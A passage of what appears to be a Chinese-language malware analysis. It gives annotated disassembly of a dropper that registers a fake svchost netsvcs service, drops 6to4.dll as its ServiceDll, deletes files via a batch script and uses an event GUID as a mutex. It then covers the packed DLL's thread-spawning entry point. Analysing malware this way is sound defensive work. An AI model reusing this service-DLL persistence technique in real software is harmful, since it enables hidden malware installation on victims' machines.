[ebp-1C] ; 开启服务 00401149 FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA 0040114F FF75 E4 push dword ptr [ebp-1C] ; 关闭句柄 00401152 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401158 FF75 F8 push dword ptr [ebp-8] 0040115B FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401161 6A 01 push 1 00401163 E8 75030000 call 004014DD 00401168 EB 12 jmp short 0040117C 0040116A FF75 E4 push dword ptr [ebp-1C] ; 删除服务 0040116D FF15 2C204000 call dword ptr [40202C] ; ADVAPI32.DeleteService 00401173 FF75 E4 push dword ptr [ebp-1C] 00401176 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 0040117C 8D85 B0F9FFFF lea eax, dword ptr [ebp- 650] ; isdelfilecevent(ebp-18)不是一 00401182 8945 FC mov dword ptr [ebp-4], eax ; netsvcs 00401185 8B45 FC mov eax, dword ptr [ebp-4] ; 取得 netsvcs的四个字节数据 00401188 0FBE00 movsx eax, byte ptr [eax] 0040118B 85C0 test eax, eax 0040118D 0F84 92010000 je 00401325 ; 判断第一 个数据是否为零 00401193 6A 00 push 0 00401195 6A 00 push 0 00401197 6A 00 push 0 00401199 6A 00 push 0 0040119B 6A 00 push 0 0040119D 68 C8214000 push 004021C8 ; ASCII "%SystemRoot%\System32\svchost.exe -k netsvcs" 004011A2 6A 01 push 1 004011A4 6A 02 push 2 004011A6 6A 20 push 20 004011A8 6A 10 push 10 004011AA FF75 FC push dword ptr [ebp-4] 004011AD FF75 FC push dword ptr [ebp-4] 004011B0 FF75 F8 push dword ptr [ebp-8] ; 自己创建 一个netsvcs服务 004011B3 FF15 04204000 call dword ptr [402004] ; ADVAPI32.CreateServiceA 004011B9 8945 E4 mov dword ptr [ebp-1C], eax 004011BC 837D E4 00 cmp dword ptr [ebp- 1C], 0 ; hserv(ebp-1c)服务句柄 004011C0 0F84 3E010000 je 00401304 004011C6 68 04010000 push 104 004011CB 8D85 98F7FFFF lea eax, dword ptr [ebp- 868] ; pdir(ebp-868) 004011D1 50 push eax ; 获得系统 目录 004011D2 FF15 54204000 call dword ptr [402054] ; kernel32.GetSystemDirectoryA 004011D8 68 04010000 push 104 004011DD 6A 00 push 0 004011DF 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 004011E5 50 push eax 004011E6 E8 A90A0000 call 00401C94 ; jmp 到 MSVCRT.memset 004011EB 83C4 0C add esp, 0C 004011EE FF75 FC push dword ptr [ebp-4] 004011F1 8D85 98F7FFFF lea eax, dword ptr [ebp-868] 004011F7 50 push eax 004011F8 68 F8214000 push 004021F8 ; ASCII "%s\%s.dll" 004011FD 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 00401203 50 push eax ; str_sprintf(ebp- 758)系统目录/6to4.dll 00401204 FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA 0040120A 83C4 10 add esp, 10 0040120D 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 00401213 50 push eax ; 在系统目 录下创建6to4.dll 00401214 E8 10070000 call 00401929 ; create(str_sprintf) 00401219 85C0 test eax, eax 0040121B 75 0A jnz short 00401227 0040121D E9 E2000000 jmp 00401304 00401222 E9 DD000000 jmp 00401304 00401227 68 00040000 push 400 ; 创建成功 0040122C 6A 00 push 0 0040122E 8D85 98F3FFFF lea eax, dword ptr [ebp-C68] ; str_sprintf2(ebp-c68)systemcurentcontrolset/service/6to4 00401234 50 push eax 00401235 E8 5A0A0000 call 00401C94 ; jmp 到 MSVCRT.memset 0040123A 83C4 0C add esp, 0C 0040123D FF75 FC push dword ptr [ebp-4] 00401240 68 04224000 push 00402204 ; ASCII "SYSTEM\CurrentControlSet\Services\%s" 00401245 8D85 98F3FFFF lea eax, dword ptr [ebp-C68] 0040124B 50 push eax 0040124C FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA 00401252 83C4 0C add esp, 0C 00401255 8D85 A4F8FFFF lea eax, dword ptr [ebp-75C] 0040125B 50 push eax 0040125C 68 1F000200 push 2001F 00401261 6A 00 push 0 00401263 8D85 98F3FFFF lea eax, dword ptr [ebp-C68] 00401269 50 push eax 0040126A 68 02000080 push 80000002 ; 打开 str_sprintf2(6to4服务的)键 0040126F FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA 00401275 8D45 F4 lea eax, dword ptr [ebp-C] 00401278 50 push eax 00401279 8D85 A4F8FFFF lea eax, dword ptr [ebp-75C] ; hreg 0040127F 50 push eax 00401280 6A 00 push 0 00401282 68 3F000F00 push 0F003F 00401287 6A 00 push 0 00401289 6A 00 push 0 0040128B 6A 00 push 0 0040128D 68 2C224000 push 0040222C ; ASCII "Parameters" 00401292 FFB5 A4F8FFFF push dword ptr [ebp-75C] ; 创建参数 选项 00401298 FF15 18204000 call dword ptr [402018] ; ADVAPI32.RegCreateKeyExA 0040129E 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 004012A4 50 push eax ; 查看系统 目录/6to4.dll的长度 004012A5 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA 004012AB 50 push eax 004012AC 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 004012B2 50 push eax 004012B3 6A 02 push 2 004012B5 6A 00 push 0 004012B7 68 38224000 push 00402238 ; ASCII "ServiceDll" 004012BC FFB5 A4F8FFFF push dword ptr [ebp-75C] ; 服务动态 链接库填写6to4.dll 004012C2 FF15 0C204000 call dword ptr [40200C] ; ADVAPI32.RegSetValueExA 004012C8 FFB5 A4F8FFFF push dword ptr [ebp-75C] 004012CE FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 004012D4 6A 00 push 0 004012D6 6A 00 push 0 004012D8 FF75 E4 push dword ptr [ebp-1C] ; 开启服务 004012DB FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA 004012E1 85C0 test eax, eax 004012E3 75 06 jnz short 004012EB 004012E5 EB 1D jmp short 00401304 004012E7 EB 1B jmp short 00401304 004012E9 EB 19 jmp short 00401304 004012EB FF75 E4 push dword ptr [ebp-1C] 004012EE FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 004012F4 FF75 F8 push dword ptr [ebp-8] 004012F7 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 004012FD 6A 01 push 1 004012FF E8 D9010000 call 004014DD ; 函数 createdos(b) 00401304 FF75 E4 push dword ptr [ebp-1C] 00401307 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 0040130D FF75 FC push dword ptr [ebp-4] ; 6to4 的长度 00401310 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA 00401316 8B4D FC mov ecx, dword ptr [ebp-4] 00401319 8D4401 01 lea eax, dword ptr [ecx+eax+1] 0040131D 8945 FC mov dword ptr [ebp-4], eax 00401320 ^ E9 60FEFFFF jmp 00401185 00401325 83A5 B4FDFFFF 0>and dword ptr [ebp-24C], 0 0040132C 83A5 94F3FFFF 0>and dword ptr [ebp-C6C], 0 00401333 EB 0D jmp short 00401342 00401335 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C] 0040133B 40 inc eax 0040133C 8985 94F3FFFF mov dword ptr [ebp-C6C], eax 00401342 83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 7 00401349 0F8D 78010000 jge 004014C7 0040134F 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C] 00401355 FF3485 00304000 push dword ptr [eax*4+403000] 0040135C 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] 00401362 50 push eax 00401363 FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA 00401369 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C] 0040136F FF3485 1C304000 push dword ptr [eax*4+40301C] 00401376 8D85 B8FDFFFF lea eax, dword ptr [ebp-248] 0040137C 50 push eax 0040137D FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA 00401383 68 FF010F00 push 0F01FF 00401388 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] 0040138E 50 push eax 0040138F FF75 F8 push dword ptr [ebp-8] 00401392 FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA 00401398 8945 E4 mov dword ptr [ebp-1C], eax 0040139B 837D E4 00 cmp dword ptr [ebp-1C], 0 0040139F 75 02 jnz short 004013A3 004013A1 ^ EB 92 jmp short 00401335 004013A3 6A 1C push 1C 004013A5 6A 00 push 0 004013A7 8D85 78F3FFFF lea eax, dword ptr [ebp-C88] 004013AD 50 push eax 004013AE E8 E1080000 call 00401C94 ; jmp 到 MSVCRT.memset 004013B3 83C4 0C add esp, 0C 004013B6 8D85 78F3FFFF lea eax, dword ptr [ebp-C88] 004013BC 50 push eax 004013BD FF75 E4 push dword ptr [ebp-1C] 004013C0 FF15 20204000 call dword ptr [402020] ; ADVAPI32.QueryServiceStatus 004013C6 83BD 7CF3FFFF 0>cmp dword ptr [ebp-C84], 1 004013CD 74 33 je short 00401402 004013CF 83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0 004013D6 75 0A jnz short 004013E2 004013D8 E9 B9000000 jmp 00401496 004013DD E9 B4000000 jmp 00401496 004013E2 8D85 78F3FFFF lea eax, dword ptr [ebp-C88] 004013E8 50 push eax 004013E9 6A 01 push 1 004013EB FF75 E4 push dword ptr [ebp-1C] 004013EE FF15 28204000 call dword ptr [402028] ; ADVAPI32.ControlService 004013F4 85C0 test eax, eax 004013F6 75 0A jnz short 00401402 004013F8 E9 99000000 jmp 00401496 004013FD E9 94000000 jmp 00401496 00401402 68 04010000 push 104 00401407 6A 00 push 0 00401409 8D85 70F2FFFF lea eax, dword ptr [ebp-D90] 0040140F 50 push eax 00401410 E8 7F080000 call 00401C94 ; jmp 到 MSVCRT.memset 00401415 83C4 0C add esp, 0C 00401418 68 04010000 push 104 0040141D 8D85 70F2FFFF lea eax, dword ptr [ebp-D90] 00401423 50 push eax 00401424 FF15 54204000 call dword ptr [402054] ; kernel32.GetSystemDirectoryA 0040142A 68 44224000 push 00402244 0040142F 8D85 70F2FFFF lea eax, dword ptr [ebp-D90] 00401435 50 push eax 00401436 FF15 58204000 call dword ptr [402058] ; kernel32.lstrcatA 0040143C 8D85 B8FDFFFF lea eax, dword ptr [ebp-248] 00401442 50 push eax 00401443 8D85 70F2FFFF lea eax, dword ptr [ebp-D90] 00401449 50 push eax 0040144A FF15 58204000 call dword ptr [402058] ; kernel32.lstrcatA 00401450 8D85 70F2FFFF lea eax, dword ptr [ebp-D90] 00401456 50 push eax 00401457 E8 CD040000 call 00401929 0040145C 85C0 test eax, eax 0040145E 75 06 jnz short 00401466 00401460 EB 34 jmp short 00401496 00401462 EB 32 jmp short 00401496 00401464 EB 30 jmp short 00401496 00401466 6A 00 push 0 00401468 6A 00 push 0 0040146A FF75 E4 push dword ptr [ebp-1C] 0040146D FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA 00401473 85C0 test eax, eax 00401475 75 06 jnz short 0040147D 00401477 EB 1D jmp short 00401496 00401479 EB 1B jmp short 00401496 0040147B EB 19 jmp short 00401496 0040147D FF75 E4 push dword ptr [ebp-1C] 00401480 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401486 FF75 F8 push dword ptr [ebp-8] 00401489 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 0040148F 6A 01 push 1 00401491 E8 47000000 call 004014DD 00401496 FF75 E4 push dword ptr [ebp-1C] 00401499 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 0040149F 83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 6 004014A6 75 1A jnz short 004014C2 004014A8 83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0 004014AF 75 11 jnz short 004014C2 004014B1 C785 B4FDFFFF 0>mov dword ptr [ebp-24C], 1 004014BB 838D 94F3FFFF F>or dword ptr [ebp-C6C], FFFFFFFF 004014C2 ^ E9 6EFEFFFF jmp 00401335 004014C7 FF75 F8 push dword ptr [ebp-8] 004014CA FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 004014D0 6A 00 push 0 004014D2 E8 06000000 call 004014DD 004014D7 33C0 xor eax, eax 004014D9 C9 leave 004014DA C2 1000 retn 10 主程序中定义的函数: 返回bool型变量,psubstr是数据返回的指针,返回的是当前路径和文件名,第一个空格以后的字符串,bool型变量指示,是否删除 psubstr文件及创建事件。 004016FF 55 push ebp ; 函数 fcheckfile(psubstr) 00401700 8BEC mov ebp, esp 00401702 83EC 18 sub esp, 18 ; 分配18 字节局部变量空间 00401705 8365 FC 00 and dword ptr [ebp-4], 0 ; ebp- 4处清零,并取的命令行参数 00401709 FF15 44204000 call dword ptr [402044] ; kernel32.GetCommandLineA 0040170F 8945 E8 mov dword ptr [ebp-18], eax ; 取得了 tem81的全路径地址存放在luj(ebp-18)处 00401712 6A 20 push 20 00401714 FF75 E8 push dword ptr [ebp-18] ; 查找字符 20(空格)最后出现的位置 00401717 FF15 BC204000 call dword ptr [4020BC] ; MSVCRT.strrchr 0040171D 59 pop ecx ; 外部平衡 堆栈 0040171E 59 pop ecx 0040171F 8945 F8 mov dword ptr [ebp-8], eax ; 把最后出 现空格的指针给pspace(ebp-8) 00401722 837D F8 00 cmp dword ptr [ebp-8], 0 00401726 74 54 je short 0040177C ; 如果没有 出现空格,跳转 00401728 8B45 F8 mov eax, dword ptr [ebp-8] ; 否则就把 空格的指针pspace给eax 0040172B 40 inc eax ; eaxjia 一,eax就指向了空格的下一个字符 0040172C 8945 F8 mov dword ptr [ebp-8], eax 0040172F FF75 F8 push dword ptr [ebp-8] ; p指向了 空格的下一个字符,取得p字符的长度 00401732 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA 00401738 8945 F0 mov dword ptr [ebp-10], eax ; 把空格后 面的长度给sublen(ebp-10) 0040173B 837D F0 01 cmp dword ptr [ebp-10], 1 ; 长度 sublen小于等于1就跳转 0040173F 7E 0B jle short 0040174C 00401741 837D F0 07 cmp dword ptr [ebp-10], 7 00401745 7D 05 jge short 0040174C ; 大于等于 7也跳转 00401747 E8 1CFFFFFF call 00401668 0040174C 837D F0 06 cmp dword ptr [ebp-10], 6 ; 长度小于 1或大于7就执行这里 00401750 7E 2A jle short 0040177C ; 长度小于 六就跳转 00401752 C745 FC 0100000>mov dword ptr [ebp-4], 1 ; 变 量a(ebp-4)=1 00401759 FF75 F8 push dword ptr [ebp-8] ; 把空格后 面的指针给进栈 0040175C FF75 08 push dword ptr [ebp+8] ; 函数的第 一个参数psubstr进栈,把空格后面的字符写入第一参数地址处 0040175F FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA 00401765 68 80000000 push 80 ; 正常属性 0040176A FF75 08 push dword ptr [ebp+8] ; 设置 psubstr指针指向的文件的安全属性为80 0040176D FF15 6C204000 call dword ptr [40206C] ; kernel32.SetFileAttributesA 00401773 FF75 08 push dword ptr [ebp+8] ; 压入文件 名指针psubstr,删除psubstr文件 00401776 FF15 90204000 call dword ptr [402090] ; kernel32.DeleteFileA 0040177C 8365 F4 00 and dword ptr [ebp-C], 0 ; 变量 hevent(ebp-c)清零 00401780 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 00401785 6A 00 push 0 ; 事件的初 始状态 00401787 6A 01 push 1 ; 是否手动 设置受信 00401789 6A 00 push 0 ; 事件的安 全性,创建事件 0040178B FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA 00401791 8945 F4 mov dword ptr [ebp- C], eax ; hevent=事件句柄 00401794 837D F4 00 cmp dword ptr [ebp-C], 0 ; 如果事件 句柄为空,跳转 00401798 74 0D je short 004017A7 0040179A FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error 004017A0 3D B7000000 cmp eax, 0B7 ; 如果事件 句柄hevent是不是空,判断最后错误是否是b7 004017A5 75 7A jnz short 00401821 ; 不是b7 错误就跳到,关闭句柄 004017A7 837D F4 00 cmp dword ptr [ebp-C], 0 ; 是b7错 误,hevent句柄再判断是否外为零 004017AB 74 09 je short 004017B6 004017AD FF75 F4 push dword ptr [ebp-C] 004017B0 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle 004017B6 837D FC 00 cmp dword ptr [ebp-4], 0 ; 判断句柄 是否为零 004017BA 75 14 jnz short 004017D0 ; 不为零就 跳转 004017BC 833D 38304000 0>cmp dword ptr [403038], 1 004017C3 75 0B jnz short 004017D0 004017C5 6A 00 push 0 004017C7 E8 11FDFFFF call 004014DD 004017CC 33C0 xor eax, eax 004017CE EB 5D jmp short 0040182D 004017D0 8365 EC 00 and dword ptr [ebp-14], 0 004017D4 EB 07 jmp short 004017DD 004017D6 8B45 EC mov eax, dword ptr [ebp-14] 004017D9 40 inc eax 004017DA 8945 EC mov dword ptr [ebp-14], eax 004017DD 817D EC 9001000>cmp dword ptr [ebp-14], 190 004017E4 7D 3B jge short 00401821 004017E6 6A 32 push 32 004017E8 FF15 48204000 call dword ptr [402048] ; kernel32.Sleep 004017EE 8365 F4 00 and dword ptr [ebp-C], 0 004017F2 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 004017F7 6A 00 push 0 004017F9 6A 01 push 1 004017FB 6A 00 push 0 004017FD FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA 00401803 8945 F4 mov dword ptr [ebp-C], eax 00401806 837D F4 00 cmp dword ptr [ebp-C], 0 0040180A 74 11 je short 0040181D 0040180C FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error 00401812 3D B7000000 cmp eax, 0B7 00401817 74 04 je short 0040181D 00401819 EB 06 jmp short 00401821 0040181B EB 02 jmp short 0040181F 0040181D ^ EB B7 jmp short 004017D6 0040181F ^ EB B5 jmp short 004017D6 00401821 FF75 F4 push dword ptr [ebp-C] 00401824 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle 0040182A 8B45 FC mov eax, dword ptr [ebp-4] 0040182D C9 leave 0040182E C2 0400 retn 4 ; fcheckfile 函数结束 函数openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符 pnetsvcs,输入的参数,svchost注册表netsvcs键的 值:6to4 AppMgmt AudioSrv Browser CryptSvc DMServer DHCP ERSvc等等 psubspace, pz, 00401B09 55 push ebp ; 调用函数 openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符 00401B0A 8BEC mov ebp, esp 00401B0C 81EC 38040000 sub esp, 438 00401B12 8365 F4 00 and dword ptr [ebp-C], 0 ; ebp- c等于零 00401B16 8B45 08 mov eax, dword ptr [ebp+8] ; 取 pnetsvcs 00401B19 8945 FC mov dword ptr [ebp- 4], eax ; s_1(ebp-4)等于pnetsvcs 00401B1C EB 13 jmp short 00401B31 00401B1E FF75 FC push dword ptr [ebp-4] 00401B21 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA 00401B27 8B4D FC mov ecx, dword ptr [ebp-4] 00401B2A 8D4401 01 lea eax, dword ptr [ecx+eax+1] 00401B2E 8945 FC mov dword ptr [ebp-4], eax 00401B31 8B45 FC mov eax, dword ptr [ebp-4] ; 取得 s_1(6to4字符串) 00401B34 0FBE00 movsx eax, byte ptr [eax] ; 取第一个 字符 00401B37 85C0 test eax, eax ; 判断是否 是零 00401B39 0F84 4E010000 je 00401C8D ; 如果是零 跳转 00401B3F 83A5 ECFBFFFF 0>and dword ptr [ebp- 414], 0 ; s_2handle(ebp-414)清零 00401B46 68 00040000 push 400 00401B4B 6A 00 push 0 00401B4D 8D85 F0FBFFFF lea eax, dword ptr [ebp- 410] ; s_sprintf(ebp-410)以后400字节清零 00401B53 50 push eax ; ebp- 410后面400字节也清零 00401B54 E8 3B010000 call 00401C94 ; jmp 到 MSVCRT.memset 00401B59 83C4 0C add esp, 0C ; 平衡堆栈 00401B5C FF75 FC push dword ptr [ebp-4] ; 6toc 字符地址 00401B5F 68 40234000 push 00402340 ; ASCII "SYSTEM\CurrentControlSet\Services\%s\Parameters" 00401B64 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 存储格式 化后的字符地址 00401B6A 50 push eax ; system\currentcontrolset/services\6to4\parameters 00401B6B FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA 00401B71 83C4 0C add esp, 0C ; 平衡堆栈 00401B74 8D85 ECFBFFFF lea eax, dword ptr [ebp-414] ; 取得 s_2(ebp-414)的地址 00401B7A 50 push eax ; 返回的句 柄s_2handle = 0012EE08 00401B7B 6A 01 push 1 ; Access = KEY_QUERY_VALUE 00401B7D 6A 00 push 0 ; reserved=0 00401B7F 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 取得 s_sprintf(ebp-410)的地址 00401B85 50 push eax ; Subkey = "SYSTEM\CurrentControlSet\Services\6to4\Parameters" 00401B86 68 02000080 push 80000002 ; hKey = HKEY_LOCAL_MACHINE 00401B8B FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA 00401B91 85C0 test eax, eax ; 打开支持 服务的dll注册选项 00401B93 0F85 EF000000 jnz 00401C88 ; 不等于 零,则打开错误跳转 00401B99 68 00040000 push 400 00401B9E 6A 00 push 0 00401BA0 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 清空s ——sprintf 00401BA6 50 push eax 00401BA7 E8 E8000000 call 00401C94 ; jmp 到 MSVCRT.memset 00401BAC 83C4 0C add esp, 0C 00401BAF C745 F8 0004000>mov dword ptr [ebp- 8], 400 ; s_size(ebp-8)赋值400 00401BB6 8D45 F8 lea eax, dword ptr [ebp-8] 00401BB9 50 push eax 00401BBA 8D85 F0FBFFFF lea eax, dword ptr [ebp- 410] ; sprintf接受值当前的服务链接库 00401BC0 50 push eax 00401BC1 8D45 F0 lea eax, dword ptr [ebp-10] ; s_5valuetype(ebp-10) 00401BC4 50 push eax ; pValueType = 0012F20C 00401BC5 6A 00 push 0 ; Reserved = NULL 00401BC7 68 38224000 push 00402238 ; ValueName = "ServiceDll" 00401BCC FFB5 ECFBFFFF push dword ptr [ebp- 414] ; s_2handle句柄,搜索服务当前的支持动态链接库 00401BD2 FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegQueryValueExA 00401BD8 FF75 0C push dword ptr [ebp+C] ; 第二参数 psubspace进栈 00401BDB 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] 00401BE1 50 push eax ; sprintf 接受值 00401BE2 FF15 64204000 call dword ptr [402064] ; kernel32.lstrcmpiA 00401BE8 85C0 test eax, eax 00401BEA 0F85 8C000000 jnz 00401C7C ; 如果 psubspace和sprintf不一样跳转 00401BF0 FF75 FC push dword ptr [ebp-4] ; 如果一 样,把这个服务名 00401BF3 FF75 10 push dword ptr [ebp+10] ; 把服务值 赋给pz地址处 00401BF6 FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA 00401BFC 68 3F000F00 push 0F003F 00401C01 6A 00 push 0 00401C03 6A 00 push 0 ; 打开数据 库连接 00401C05 FF15 24204000 call dword ptr [402024] ; ADVAPI32.OpenSCManagerA 00401C0B 8985 E8FBFFFF mov dword ptr [ebp-418], eax 00401C11 6A 20 push 20 00401C13 FF75 FC push dword ptr [ebp-4] 00401C16 FFB5 E8FBFFFF push dword ptr [ebp-418] ; 打开服务 这个服务 00401C1C FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA 00401C22 8985 E4FBFFFF mov dword ptr [ebp- 41C], eax ; hservice(ebp-41c) 00401C28 6A 1C push 1C 00401C2A 6A 00 push 0 00401C2C 8D85 C8FBFFFF lea eax, dword ptr [ebp-438] 00401C32 50 push eax 00401C33 E8 5C000000 call 00401C94 ; jmp 到 MSVCRT.memset 00401C38 83C4 0C add esp, 0C 00401C3B 8D85 C8FBFFFF lea eax, dword ptr [ebp-438] 00401C41 50 push eax 00401C42 6A 01 push 1 00401C44 FFB5 E4FBFFFF push dword ptr [ebp-41C] 00401C4A FF15 28204000 call dword ptr [402028] ; ADVAPI32.ControlService 00401C50 8945 F4 mov dword ptr [ebp-C], eax 00401C53 FFB5 E4FBFFFF push dword ptr [ebp-41C] 00401C59 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401C5F FFB5 E8FBFFFF push dword ptr [ebp-418] 00401C65 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401C6B FFB5 ECFBFFFF push dword ptr [ebp-414] 00401C71 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 00401C77 8B45 F4 mov eax, dword ptr [ebp-C] 00401C7A EB 14 jmp short 00401C90 00401C7C FFB5 ECFBFFFF push dword ptr [ebp-414] ; 关闭打开 的注册表 00401C82 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 00401C88 ^ E9 91FEFFFF jmp 00401B1E ; 循环查找 下一项注册表 00401C8D 8B45 F4 mov eax, dword ptr [ebp-C] 00401C90 C9 leave 00401C91 C2 0C00 retn 0C create(文件名)函数,创建文件, createdos函数,创建一个批处理文件,并执行,成功返回true。 6to4.dll文件: 6to4.dll文件也是upx加壳的,它的主程序入口是:10005D51 6to4.dll主程序,主要是在100032FD处f(x,y,z)函数中创建了线程线程,线程的过程函数在332a地址。 主程序的分析: 10005D51 55 push ebp ; 主程序入口 10005D52 8BEC mov ebp, esp 10005D54 53 push ebx ; 模块入口点 10005D55 8B5D 08 mov ebx, dword ptr [ebp+8] ; 参数 x,6to4.10000000 10005D58 56 push esi 10005D59 8B75 0C mov esi, dword ptr [ebp+C] ; 参数y,输入参 数个数 10005D5C 57 push edi 10005D5D 8B7D 10 mov edi, dword ptr [ebp+10] ; 参数z 10005D60 85F6 test esi, esi 10005D62 75 09 jnz short 10005D6D ; y!=0,跳转 10005D64 833D 10900010 0>cmp dword ptr [10009010], 0 ; 如果 y==0,再比较【10009010】==0 10005D6B EB 26 jmp short 10005D93 10005D6D 83FE 01 cmp esi, 1 ; 如果y==1跳 转 10005D70 74 05 je short 10005D77 10005D72 83FE 02 cmp esi, 2 10005D75 75 22 jnz short 10005D99 10005D77 A1 9C940010 mov eax, dword ptr [1000949C] ; y==1跳转到 这里,判断【1000949c】是否为零 10005D7C 85C0 test eax, eax 10005D7E 74 09 je short 10005D89 10005D80 57 push edi 10005D81 56 push esi 10005D82 53 push ebx 10005D83 FFD0 call eax 10005D85 85C0 test eax, eax 10005D87 74 0C je short 10005D95 ; 为零就跳转 10005D89 57 push edi ; y==1, 【1000949c】==零就跳到这里 10005D8A 56 push esi 10005D8B 53 push ebx 10005D8C E8 15FFFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z),分配80的空间指针在9498处返回true 10005D91 85C0 test eax, eax 10005D93 75 04 jnz short 10005D99 ; 函数f1 【4910】0(x,y,z)结果返回不是零跳转 10005D95 33C0 xor eax, eax 10005D97 EB 4E jmp short 10005DE7 10005D99 57 push edi 10005D9A 56 push esi 10005D9B 53 push ebx 10005D9C E8 5CD5FFFF call 100032FD ; 调用 f(x,y,z)创建线程线程过程函数332a 10005DA1 83FE 01 cmp esi, 1 10005DA4 8945 0C mov dword ptr [ebp+C], eax ; 返回bool型 变量,函数的第二个参数给为是否调用创建线程 10005DA7 75 0C jnz short 10005DB5 10005DA9 85C0 test eax, eax 10005DAB 75 37 jnz short 10005DE4 ; 返回f返回值不 是零就跳转结束 10005DAD 57 push edi 10005DAE 50 push eax 10005DAF 53 push ebx 10005DB0 E8 F1FEFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z) 10005DB5 85F6 test esi, esi 10005DB7 74 05 je short 10005DBE 10005DB9 83FE 03 cmp esi, 3 10005DBC 75 26 jnz short 10005DE4 10005DBE 57 push edi 10005DBF 56 push esi 10005DC0 53 push ebx 10005DC1 E8 E0FEFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z) 10005DC6 85C0 test eax, eax 10005DC8 75 03 jnz short 10005DCD 10005DCA 2145 0C and dword ptr [ebp+C], eax 10005DCD 837D 0C 00 cmp dword ptr [ebp+C], 0 10005DD1 74 11 je short 10005DE4 10005DD3 A1 9C940010 mov eax, dword ptr [1000949C] 10005DD8 85C0 test eax, eax 10005DDA 74 08 je short 10005DE4 10005DDC 57 push edi 10005DDD 56 push esi 10005DDE 53 push ebx 10005DDF FFD0 call eax 10005DE1 8945 0C mov dword ptr [ebp+C], eax 10005DE4 8B45 0C mov eax, dword ptr [ebp+C] 10005DE7 5F pop edi 10005DE8 5E pop esi 10005DE9 5B pop ebx 10005DEA 5D pop ebp 10005DEB C2 0C00 retn 0C f(x,y,z)函数,创建线程的分析: 100032FD 55 push ebp ; f(x,y,z) 成功返回true,创建线程,过程函数332a 100032FE 8BEC mov ebp, esp 10003300 837D 0C 01 cmp dword ptr [ebp+C], 1 ; y==0? 10003304 75 1D jnz short 10003323 ; y不等于零就跳 转 10003306 8B45 08 mov eax, dword ptr [ebp+8] 10003309 A3 7C940010 mov dword ptr [1000947C], eax ; 把x给 【947c】 1000330E 6A 00 push 0 10003310 6A 00 push 0 10003312 6A 00 push 0 10003314 68 2A330010 push 1000332A ; ThreadFunction = 6to4.1000332A 10003319 6A 00 push 0 ; StackSize = 0 1000331B 6A 00 push 0 ; pSecurity = NULL 1000331D FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread 10003323 33C0 xor eax, eax 10003325 40 inc eax 10003326 5D pop ebp 10003327 C2 0C00 retn 0C 在主程序中海还调用了的自定义函数f1【4910】0(x,y,z): 10005CA6 8B4424 08 mov eax, dword ptr [esp+8] ; 函数f1 【4910】0(x,y,z) 10005CAA 